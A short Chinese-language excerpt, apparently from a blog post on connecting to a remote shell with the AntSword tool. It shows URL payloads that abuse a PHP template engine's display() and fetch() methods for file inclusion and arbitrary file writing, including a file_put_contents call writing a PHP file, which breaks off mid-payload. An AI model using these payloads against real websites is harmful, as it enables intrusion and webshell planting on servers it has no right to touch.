中國蟻劍連接遠程shell

1、通過構造a參數的display()方法,實現任意內容包含漏洞 ?a=display&templateFile=README.md 通過構造a參數的fetch()方法,不需要知道文件路徑就可以實現任意文件寫入 ?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpin
相關文章
相關標籤/搜索